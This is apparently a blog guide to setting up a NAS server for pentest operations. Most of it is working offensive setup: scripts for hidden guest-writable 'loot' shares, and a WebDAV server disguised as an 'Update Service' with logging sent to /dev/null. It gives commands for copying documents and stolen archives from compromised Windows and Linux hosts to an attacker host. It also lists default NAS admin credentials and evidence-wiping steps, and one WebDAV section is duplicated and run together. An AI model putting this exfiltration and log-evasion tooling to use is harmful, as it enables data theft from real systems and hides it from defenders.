How To Set Up A NAS Server For Hacking (Guide)
- Biohazard

- 2 days ago
- 7 min read

Setting Up A NAS Servers For Pentesting
Here's how to set up a NAS server, framed for pentest operations — whether it's for exfiltration staging, payload hosting, or as a target for security assessment. This is a guide on how to set up a NAS server for hacking.
Pentest Use Cases for a Self-Hosted NAS
Before building, clarify what the NAS is for:
Purpose | What You Need | Key Consideration |
Exfiltration drop server | Quick SMB/NFS/WebDAV share | Must be externally reachable, minimal logging |
Payload/tool hosting | HTTP/S + SMB for internal tool distribution | Accessible from all engagement hosts |
Phishing landing page host | Web server on 80/443 | Needs TLS, domain, clean IP reputation |
Loot storage (encrypted) | Encrypted ZFS volume, isolated | Air-gapped or internal-only, strong encryption |
Target for NAS pentest | Full TrueNAS/OMV/QNAP deployment | Realistic configuration, multiple services |
C2 file staging | Lightweight HTTP/HTTPS | Redirector-friendly, disposable |
Option 1: Lightweight NAS for Pentest Ops (Samba + WebDAV on Ubuntu)
Fastest to deploy, minimal attack surface. Run it on a VPS, old laptop, or dedicated server.
bash
#!/bin/bash
# pentest-nas.sh — Quick NAS deployment for pentest operations
# Deploys Samba + WebDAV + HTTPS file server on Ubuntu/Debian
set -e
# ===== Update and Install =====
apt update
apt install -y samba apache2 apache2-utils openssl
# ===== Create Directory Structure =====
mkdir -p /srv/nas/{payloads,loot,logs,tools,phishing}
chmod -R 755 /srv/nas
chown -R nobody:nogroup /srv/nas/loot # Loot dir writeable by all
# ===== Samba Configuration (Internal Network) =====
cat > /etc/samba/smb.conf << 'SMBEOF'
[global]
workgroup = WORKGROUP
server string = Pentest NAS
log file = /var/log/samba/log.%m
max log size = 1000
logging = file
map to guest = Bad User
# Minimal logging for ops
log level = 0
[payloads]
comment = Payloads and Tools
path = /srv/nas/payloads
browseable = yes
read only = no
guest ok = yes
create mask = 0644
[loot]
comment = Exfiltration Drop
path = /srv/nas/loot
browseable = no # Hidden from casual browsing
read only = no
guest ok = yes
create mask = 0666
directory mask = 0777
[tools]
comment = Pentest Tools
path = /srv/nas/tools
browseable = yes
read only = yes
guest ok = yes
SMBEOF
systemctl restart smbd
systemctl enable smbd
# Optional: NFS for Linux targets
apt install -y nfs-kernel-server
echo "/srv/nas/loot *(rw,sync,no_subtree_check,no_root_squash)" >> /etc/exports
echo "/srv/nas/tools *(ro,sync,no_subtree_check)" >> /etc/exports
systemctl restart nfs-kernel-server
echo "[+] Samba shares:"
echo " \\\\$(hostname -I | awk '{print $1}')\\payloads"
echo " \\\\$(hostname -I | awk '{print $1}')\\loot"
echo " \\\\$(hostname -I | awk '{print $1}')\\tools"
How attackers use Samba in engagements:
bash
# Exfiltrate data from compromised Windows host to your NAS
# From target (CMD):
net use Z: \\YOUR_NAS_IP\loot
copy /Y C:\sensitive\*.* Z:\
net use Z: /delete
# From target (PowerShell):
New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\YOUR_NAS_IP\loot"
Copy-Item -Path "C:\Users\*\Documents\*" -Destination "Z:\" -Recurse
# From Linux target:
mount -t nfs YOUR_NAS_IP:/srv/nas/loot /mnt/drop
cp -r /home/*/ /mnt/drop/
umount /mnt/drop
WebDAV Over HTTPS (Exfiltrate Through Firewalls)
WebDAV over HTTPS looks like normal web traffic and bypasses egress filters that block SMB:
bash
# Enable WebDAV on Apache
a2enmod dav dav_fs dav_lock ssl rewrite
a2ensite default-ssl
cat > /etc/apache2/sites-available/webdav.conf << 'EOF'
<VirtualHost *:443>
ServerName update-server.local
DocumentRoot /srv/nas
# Self-signed cert (replace with Let's Encrypt for production)
SSLEngine on
SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem
SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
# WebDAV for loot directory
Alias /drop /srv/nas/loot
<Directory /srv/nas/loot>
DAV On
Options Indexes
AuthType Basic
AuthName "Update Service"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
# Static file hosting for payloads
Alias /payloads /srv/nas/payloads
<Directory /srv/nas/payloads>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
# Redirect logs to /dev/null for OPSEC
ErrorLog /dev/null
CustomLog /dev/null combined
</VirtualHost>
EOF
# Create WebDAV user
htpasswd -c /etc/apache2/.htpasswd pentest_user
a2ensite webdav
systemctl restart apache2
Exfiltration via WebDAV:
bash
# From compromised Windows host:
# Map WebDAV as a drive
net use X: https://YOUR_NAS_IP/drop /user:pentest_user password
copy secret_data.zip X:\
# Or via curl from Linux:
curl -T stolen_data.tar.gz https://YOUR_NAS_IP/drop/ \
-u pentest_user:password --insecure
# PowerShell HTTP upload (no drive mapping needed):
Invoke-WebRequest -Uri "https://YOUR_NAS_IP/drop/loot.zip" \
-Method Put -InFile "C:\temp\loot.zip" \
-Credential (Get-Credential)WebDAV Over HTTPS (Exfiltrate Through Firewalls)
WebDAV over HTTPS looks like normal web traffic and bypasses egress filters that block SMB:
bash
# Enable WebDAV on Apache
a2enmod dav dav_fs dav_lock ssl rewrite
a2ensite default-ssl
cat > /etc/apache2/sites-available/webdav.conf << 'EOF'
<VirtualHost *:443>
ServerName update-server.local
DocumentRoot /srv/nas
# Self-signed cert (replace with Let's Encrypt for production)
SSLEngine on
SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem
SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
# WebDAV for loot directory
Alias /drop /srv/nas/loot
<Directory /srv/nas/loot>
DAV On
Options Indexes
AuthType Basic
AuthName "Update Service"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
# Static file hosting for payloads
Alias /payloads /srv/nas/payloads
<Directory /srv/nas/payloads>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
# Redirect logs to /dev/null for OPSEC
ErrorLog /dev/null
CustomLog /dev/null combined
</VirtualHost>
EOF
# Create WebDAV user
htpasswd -c /etc/apache2/.htpasswd pentest_user
a2ensite webdav
systemctl restart apache2
Exfiltration via WebDAV:
bash
# From compromised Windows host:
# Map WebDAV as a drive
net use X: https://YOUR_NAS_IP/drop /user:pentest_user password
copy secret_data.zip X:\
# Or via curl from Linux:
curl -T stolen_data.tar.gz https://YOUR_NAS_IP/drop/ \
-u pentest_user:password --insecure
# PowerShell HTTP upload (no drive mapping needed):
Invoke-WebRequest -Uri "https://YOUR_NAS_IP/drop/loot.zip" \
-Method Put -InFile "C:\temp\loot.zip" \
-Credential (Get-Credential)Option 2: TrueNAS / FreeNAS - Full Enterprise NAS (Target or Infrastructure)
If you need a proper NAS with ZFS, snapshots, and enterprise features — either as pentest infrastructure for long engagements or as a realistic target to test against:
Hardware Requirements
8GB RAM minimum (ZFS loves RAM — 16GB+ recommended)
2+ identical drives for mirror/RAID
Any x86_64 system (old server, workstation, even a VM for testing)
Installation
bash
# 1. Download TrueNAS ISO from truenas.com
# 2. Flash to USB: dd if=TrueNAS.iso of=/dev/sdX bs=4M status=progress
# 3. Boot from USB, follow installer
# 4. After install, access web UI at http://IP_ADDRESS
# Initial CLI setup (option 1 from console menu):
# Configure network interface
# Set root password
Post-Install Configuration (Web UI)
Create Storage Pool:
Storage → Pools → Add
Name: pentest_pool
Select disks → Create
Layout: Mirror (2 disks) or Stripe (single disk for VM testing)
Create Dataset for Pentest Operations:
Storage → Pools → pentest_pool → ⋮ → Add Dataset
Name: loot
Compression: lz4
Encryption: YES (for sensitive pentest data)
→ Generate encryption key, download and store securely
Create SMB Share:
Sharing → SMB → Add
Path: /mnt/pentest_pool/loot
Name: Loot
Purpose: No presets (custom)
Sharing → SMB → Edit ACL
# For internal pentest use:
User: nobody, Permission: FULL
# Or restrict to specific users
Create NFS Share (for Linux targets):
Sharing → NFS → Add
Path: /mnt/pentest_pool/loot
Authorized Networks: 10.0.0.0/8 or specific IPs
TrueNAS as a Pentest Target - What To Test
If testing TrueNAS security specifically:
bash
# 1. Default credential check
# TrueNAS default: root / (no password initially — it forces you to set one)
# Try: admin / admin, root / password, root / truenas
# 2. Web UI vulnerabilities
# TrueNAS runs on nginx + Django on ports 80/443
# Check version: curl -s https://TARGET_IP | grep -i version
# Search for CVEs against that version
# 3. API abuse testing
curl -sk https://TARGET_IP/api/v2.0/system/info
curl -sk -u root:password https://TARGET_IP/api/v2.0/user
# TrueNAS API v2.0 is well-documented — test auth bypass, privilege escalation
# 4. SMB security
# Null session enumeration:
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
# Anonymous access to shares
smbclient //TARGET_IP/ShareName -N
# 5. NFS export security
showmount -e TARGET_IP
mount -t nfs TARGET_IP:/mnt/pentest_pool/loot /mnt/test
# Check if no_root_squash is set (allows root access from client)
# 6. SSH access (TrueNAS runs SSH on port 22)
# Check if root SSH is enabled
ssh root@TARGET_IP
# Check for SSH keys in /root/.ssh/authorized_keysOption 3: OpenMediaVault - Lighter Alternative
Better for low-resource hardware. Runs on Debian, has a web UI, good for quick deployments.
bash
# Install on Debian
apt install wget
wget -O - https://github.com/OpenMediaVault/openmediavault/raw/master/installScript | bash
# After reboot, access: http://IP_ADDRESS
# Default: admin / openmediavault
# Add SMB/CIFS shares through the web UI
# Plugins available: SMB, NFS, FTP, Rsync, WebDAV, Docker
# For pentest: enable SSH and use it as a Linux drop server
# with SMB for Windows targets and NFS for Linux targetsOption 4: QNAP / Synology Simulation (For Testing)
If the real pentest target is a QNAP or Synology NAS:
bash
# QNAP simulation for testing
# QNAP runs a modified Linux with BusyBox
# Common services: SMB, AFP, NFS, FTP, WebDAV, iSCSI, SSH, Telnet
# Key testing points for QNAP:
# 1. Default admin credentials: admin / admin (or MAC address as password)
# 2. QNAP firmware CVEs — they're frequent and severe
# 3. QTS web shell: /cgi-bin/ — test for command injection
# 4. Photo Station, Music Station, Video Station — frequent RCE targets
# 5. myQNAPcloud — cloud relay that bypasses firewall, test for exposure
# Synology DSM testing:
# 1. Default: admin / (blank)
# 2. DSM web UI exploits — check version-specific CVEs
# 3. SMB vulnerabilities with guest access
# 4. Synology Photos, Drive, Moments — web app vulnerabilitiesEncrypted Loot Storage Setup
For sensitive exfiltration data that must stay encrypted at rest:
bash
# Create encrypted container on your NAS
# Using LUKS on Linux:
# Create encrypted file container (10GB)
dd if=/dev/urandom of=/srv/nas/encrypted_loot.img bs=1M count=10240
cryptsetup luksFormat /srv/nas/encrypted_loot.img
# Mount when needed
cryptsetup luksOpen /srv/nas/encrypted_loot.img loot_crypt
mkfs.ext4 /dev/mapper/loot_crypt
mount /dev/mapper/loot_crypt /mnt/secure_loot
# Exfiltrate to encrypted mount point
# When done:
umount /mnt/secure_loot
cryptsetup luksClose loot_crypt
# Now even if NAS is compromised, loot data is encrypted
# The container file is just random bytes without the passphrase
On TrueNAS, use native ZFS encryption:
Storage → Pools → Dataset → Edit → Encryption: ON
Key format: Passphrase
Enter passphrase → Save
Download key backup → Store securely (offline, separate from NAS)
Operational Security for Pentest NAS
bash
# 1. Logging: Disable or minimize
# - Samba: log level = 0 (errors only) in smb.conf
# - Apache: ErrorLog /dev/null, CustomLog /dev/null
# - Systemd journal: journalctl --vacuum-time=1d
# 2. Network isolation
# - Bind services to WireGuard/VPN interface only
# - Or restrict by source IP in iptables:
iptables -A INPUT -p tcp --dport 445 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j DROP
# 3. Separate NAS from C2 infrastructure
# Don't run C2 and exfil server on same host
# 4. Encrypt all loot at rest (LUKS, ZFS encryption)
# 5. Burn after engagement
# After pentest: securely wipe NAS storage
# shred -n 3 -z /dev/sdX
# Or for ZFS: zpool destroy pentest_pool
# Then shred the underlying disks
# 6. Use a dedicated VLAN or isolated network segment
# The NAS should not be reachable from the general internetQuick Checklist for Pentest NAS Deployment
[ ] Hardware selected (old server, VPS, VM, or dedicated box)
[ ] OS installed (Ubuntu Server minimal, TrueNAS, or OMV)
[ ] Storage pool created (ZFS mirror or single disk)
[ ] Encryption enabled for loot dataset
[ ] Samba share created (authenticated or anonymous as needed)
[ ] NFS export configured (restricted to engagement IPs)
[ ] WebDAV over HTTPS set up (for firewall-safe exfiltration)
[ ] Logging minimized
[ ] Network isolation confirmed (VPN-only or firewall-restricted)
[ ] Test exfiltration: can a compromised host push data to it?
[ ] Test retrieval: can you pull the data back off securely?
[ ] Cleanup plan ready (wipe procedure documented)



Comments